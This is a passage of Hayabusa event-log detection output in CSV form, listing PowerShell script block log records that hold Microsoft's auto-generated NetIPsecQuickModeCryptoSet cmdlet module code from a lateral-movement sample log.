[object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 
'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, 
[Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
